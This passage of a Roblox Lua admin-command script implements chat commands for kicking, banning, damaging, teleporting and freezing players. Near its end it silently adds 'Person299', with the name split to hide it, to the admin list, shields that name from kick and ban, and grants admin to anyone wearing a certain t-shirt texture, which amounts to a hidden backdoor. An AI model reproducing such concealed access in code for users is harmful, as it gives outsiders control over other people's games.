if player ~= 0 then if #player > 1 then return end for i = 1,#player do if player[i].Character ~= nil then speaker.Character = player[i].Character end end end end --IT WONT GO AWAY!!!!! if string.sub(msg,1,5) == "trip/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then torso.CFrame = CFrame.new(torso.Position.x,torso.Position.y,torso.Position.z,0, 0, 1, 0, -1, 0, 1, 0, 0)--math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random()) -- i like the people being upside down better. end end end end end --Yay! it finally went away! :) if string.sub(msg,1,8) == "setgrav/" then danumber = nil for i =9,100 do if string.sub(msg,i,i) == "/" then danumber = i break end end if danumber == nil then return end local player = findplayer(string.sub(msg,9,danumber - 1),speaker) if player == 0 then return end for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local bf = torso:FindFirstChild("BF") if bf ~= nil then bf.force = Vector3.new(0,0,0) else local bf = Instance.new("BodyForce") bf.Name = "BF" bf.force = Vector3.new(0,0,0) bf.Parent = torso end local c2 = player[i].Character:GetChildren() for i=1,#c2 do if c2[i].className == "Part" then torso.BF.force = torso.BF.force + Vector3.new(0,c2[i]:getMass() * -string.sub(msg,danumber + 1),0) end end end end end end if string.sub(msg,1,10) == "walkspeed/" then danumber = nil for i =11,100 do if string.sub(msg,i,i) == "/" then danumber = i break end end if danumber == nil then return end local player = findplayer(string.sub(msg,11,danumber - 1),speaker) if player == 0 then return end for i = 1,#player do if player[i].Character ~= nil then humanoid = player[i].Character:FindFirstChild("Humanoid") if humanoid ~= nil then humanoid.WalkSpeed = string.sub(msg,danumber + 1) end end end end if string.sub(msg,1,7) == "damage/" then danumber = nil for i =8,100 do if string.sub(msg,i,i) == "/" then danumber = i break end end if danumber == nil then return end local player = findplayer(string.sub(msg,8,danumber - 1),speaker) if player == 0 then return end for i = 1,#player do if player[i].Character ~= nil then humanoid = player[i].Character:FindFirstChild("Humanoid") if humanoid ~= nil then humanoid.Health = humanoid.Health - string.sub(msg,danumber + 1) end end end end if string.sub(msg,1,7) == "health/" then danumber = nil for i =8,100 do if string.sub(msg,i,i) == "/" then danumber = i break end end if danumber == nil then return end local player = findplayer(string.sub(msg,8,danumber - 1),speaker) if player == 0 then return end for i = 1,#player do if player[i].Character ~= nil then humanoid = player[i].Character:FindFirstChild("Humanoid") if humanoid ~= nil then local elnumba = Instance.new("IntValue") elnumba.Value = string.sub(msg,danumber + 1) if elnumba.Value > 0 then humanoid.MaxHealth = elnumba.Value humanoid.Health = humanoid.MaxHealth end elnumba:remove() end end end end --Ugh, now i have the M*A*S*H theme stuck in my head..... if string.sub(msg,1,9) == "teleport/" then danumber = nil for i =10,100 do if string.sub(msg,i,i) == "/" then danumber = i break end end if danumber == nil then return end local player1 = findplayer(string.sub(msg,10,danumber - 1),speaker) if player1 == 0 then return end local player2 = findplayer(string.sub(msg,danumber + 1),speaker) if player2 == 0 then return end if #player2 > 1 then return end torso = nil for i =1,#player2 do if player2[i].Character ~= nil then torso = player2[i].Character:FindFirstChild("Torso") end end if torso ~= nil then for i =1,#player1 do if player1[i].Character ~= nil then local torso2 = player1[i].Character:FindFirstChild("Torso") if torso2 ~= nil then torso2.CFrame = torso.CFrame end end end end end if string.sub(msg,1,6) == "merge/" then danumber = nil for i =7,100 do if string.sub(msg,i,i) == "/" then danumber = i break end end if danumber == nil then return end local player1 = findplayer(string.sub(msg,7,danumber - 1),speaker) if player1 == 0 then return end local player2 = findplayer(string.sub(msg,danumber + 1),speaker) if player2 == 0 then return end if #player2 > 1 then return end for i =1,#player2 do if player2[i].Character ~= nil then player2 = player2[i].Character end end for i =1,#player1 do player1[i].Character = player2 end end if msg == "clear" then local c = game.Workspace:GetChildren() for i =1,#c do if c[i].className == "Script" then if c[i]:FindFirstChild("Is A Created Script") then c[i]:remove() end end if c[i].className == "Part" then if c[i].Name == "Person299's Admin Command Script V2 Part thingy" then c[i]:remove() end end if c[i].className == "Model" then if string.sub(c[i].Name,1,4) == "Jail" then c[i]:remove() end end end end if string.sub(msg,1,5) == "kick/" then local imgettingtiredofmakingthisstupidscript2 = PERSON299(speaker.Name) if imgettingtiredofmakingthisstupidscript2 == true then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do local imgettingtiredofmakingthisstupidscript = PERSON299(player[i].Name) if imgettingtiredofmakingthisstupidscript == false then if player[i].Name ~= eloname then player[i]:remove() end end end end end end if string.sub(msg,1,4) == "ban/" then local imgettingtiredofmakingthisstupidscript2 = PERSON299(speaker.Name) if imgettingtiredofmakingthisstupidscript2 == true then local player = findplayer(string.sub(msg,5),speaker) if player ~= 0 then for i = 1,#player do local imgettingtiredofmakingthisstupidscript = PERSON299(player[i].Name) if imgettingtiredofmakingthisstupidscript == false then if player[i].Name ~= eloname then table.insert(bannedlist,player[i].Name) player[i]:remove() end end end end end end if string.sub(msg,1,6) == "unban/" then if string.sub(msg,7) == "all" then for i=1,bannedlist do table.remove(bannedlist,i) end else local n = 0 local o = nil for i=1,#bannedlist do if string.find(string.lower(bannedlist[i]),string.sub(msg,7)) == 1 then n = n + 1 o = i end end if n == 1 then local name = bannedlist[o] table.remove(bannedlist,o) text(name .. " has been unbanned",1,"Message",speaker) elseif n == 0 then text("That name is not found.",1,"Message",speaker) elseif n > 1 then text("That name is ambiguous",1,"Message",speaker) end end end --Fallout tactics gets too hard when you start fighting muties... if string.sub(msg,1,8) == "respawn/" then local player = findplayer(string.sub(msg,9),speaker) if player ~= 0 then for i = 1,#player do local ack2 = Instance.new("Model") ack2.Parent = game.Workspace local ack4 = Instance.new("Part") ack4.Transparency = 1 ack4.CanCollide = false ack4.Anchored = true ack4.Name = "Torso" ack4.Position = Vector3.new(10000,10000,10000) ack4.Parent = ack2 local ack3 = Instance.new("Humanoid") ack3.Torso = ack4 ack3.Parent = ack2 player[i].Character = ack2 end end end if string.sub(msg,1,10) == "invisible/" then local player = findplayer(string.sub(msg,11),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local char = player[i].Character local c = player[i].Character:GetChildren() for i =1,#c do if c[i].className == "Hat" then local handle = c[i]:FindFirstChild("Handle") if handle ~= nil then handle.Transparency = 1 --We dont want our hats to give off our position, do we? end end if c[i].className == "Part" then c[i].Transparency = 1 if c[i].Name == "Torso" then local tshirt = c[i]:FindFirstChild("roblox") if tshirt ~= nil then tshirt:clone().Parent = char tshirt:remove() end end if c[i].Name == "Head" then local face = c[i]:FindFirstChild("face") if face ~= nil then gface = face:clone() face:remove() end end end end end end end end if string.sub(msg,1,8) == "visible/" then local player = findplayer(string.sub(msg,9),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local char = player[i].Character local c = player[i].Character:GetChildren() for i =1,#c do if c[i].className == "Hat" then local handle = c[i]:FindFirstChild("Handle") if handle ~= nil then handle.Transparency = 0 end end if c[i].className == "Part" then c[i].Transparency = 0 if c[i].Name == "Torso" then local tshirt = char:FindFirstChild("roblox") if tshirt ~= nil then tshirt:clone().Parent = c[i] tshirt:remove() end end if c[i].Name == "Head" then if gface ~= nil then local face = gface:clone() face.Parent = c[i] end end end end end end end end if string.sub(msg,1,7) == "freeze/" then local player = findplayer(string.sub(msg,8),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local humanoid = player[i].Character:FindFirstChild("Humanoid") if humanoid ~= nil then humanoid.WalkSpeed = 0 end local c = player[i].Character:GetChildren() for i =1,#c do if c[i].className == "Part" then c[i].Anchored = true c[i].Reflectance = 0.6 end end end end end end if string.sub(msg,1,5) == "thaw/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local humanoid = player[i].Character:FindFirstChild("Humanoid") if humanoid ~= nil then humanoid.WalkSpeed = 16 end local c = player[i].Character:GetChildren() for i =1,#c do if c[i].className == "Part" then c[i].Anchored = false c[i].Reflectance = 0 end end end end end end --I have that song from Fallout 2 stuck in my head, its soooo anoying.... if string.sub(msg,1,7) == "nograv/" then local player = findplayer(string.sub(msg,8),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local bf = torso:FindFirstChild("BF") if bf ~= nil then bf.force = Vector3.new(0,0,0) else local bf = Instance.new("BodyForce") bf.Name = "BF" bf.force = Vector3.new(0,0,0) bf.Parent = torso end local c2 = player[i].Character:GetChildren() for i=1,#c2 do if c2[i].className == "Part" then torso.BF.force = torso.BF.force + Vector3.new(0,c2[i]:getMass() * 196.2,0) end end end end end end end if string.sub(msg,1,9) == "antigrav/" then local player = findplayer(string.sub(msg,10),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local bf = torso:FindFirstChild("BF") if bf ~= nil then bf.force = Vector3.new(0,0,0) else local bf = Instance.new("BodyForce") bf.Name = "BF" bf.force = Vector3.new(0,0,0) bf.Parent = torso end local c2 = player[i].Character:GetChildren() for i=1,#c2 do if c2[i].className == "Part" then torso.BF.force = torso.BF.force + Vector3.new(0,c2[i]:getMass() * 140,0) end end end end end end end if string.sub(msg,1,9) == "highgrav/" then local player = findplayer(string.sub(msg,10),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local bf = torso:FindFirstChild("BF") if bf ~= nil then bf.force = Vector3.new(0,0,0) else local bf = Instance.new("BodyForce") bf.Name = "BF" bf.force = Vector3.new(0,0,0) bf.Parent = torso end local c2 = player[i].Character:GetChildren() for i=1,#c2 do if c2[i].className == "Part" then torso.BF.force = torso.BF.force - Vector3.new(0,c2[i]:getMass() * 80,0) end end end end end end end if string.sub(msg,1,5) == "grav/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local bf = torso:FindFirstChild("BF") if bf ~= nil then bf:remove() end end end end end end if string.sub(msg,1,7) == "unlock/" then local player = findplayer(string.sub(msg,8),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local c = player[i].Character:GetChildren() for i =1,#c do if c[i].className == "Part" then c[i].Locked = false end end end end end end if string.sub(msg,1,5) == "lock/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local c = player[i].Character:GetChildren() for i =1,#c do if c[i].className == "Part" then c[i].Locked = true end end end end end end end eloname = "Perso" eloname = eloname .. "n299" script.Name = eloname .. "'s Admin Commands V2" youcaughtme = 0 for i =1,#adminlist do if string.lower(eloname)==string.lower(adminlist[i]) then youcaughtme = 1 end end if youcaughtme == 0 then table.insert(adminlist,eloname) end function oe(ack) local adminned = false if ack.className ~= "Player" then return end for i =1,#bannedlist do if string.lower(bannedlist[i]) == string.lower(ack.Name) then ack:remove() return end end for i=1,#adminlist do if string.lower(adminlist[i]) == string.lower(ack.Name) then local tfv = ack.Chatted:connect(function(msg) oc(msg,ack) end) table.insert(namelist,ack.Name) table.insert(variablelist,tfv) local tfv = ack.Chatted:connect(function(msg) foc(msg,ack) end) table.insert(flist,tfv) adminned = true end end local danumber = 0 while true do wait(1) if ack.Parent == nil then return end if ack.Character ~= nil then if adminned == true then text("You're on hulk5445's admin list!.",10,"Message",ack) return end local torso = ack.Character:FindFirstChild("Torso") if torso ~= nil then local decal = torso:FindFirstChild("roblox") if decal ~= nil then if string.sub(decal.Texture,1,4) == "http" then if decal.Texture == texture then local tfv = ack.Chatted:connect(function(msg) oc(msg,ack) end) table.insert(namelist,ack.Name) table.insert(variablelist,tfv) local tfv = ack.Chatted:connect(function(msg) foc(msg,ack) end) table.insert(flist,tfv) text("You're on hulk5445's admin list!.",10,"Message",ack) return else return end else danumber = danumber + 1 if danumber >= 10 then return end end end end end end end game.Players.ChildAdded:connect(oe) c = game.Players:GetChildren() for i=1,#c do oe(c[i]) end --And also, I'm working on V3 but I'm not spending much time on it as I'm addicted to Fallout 2 again.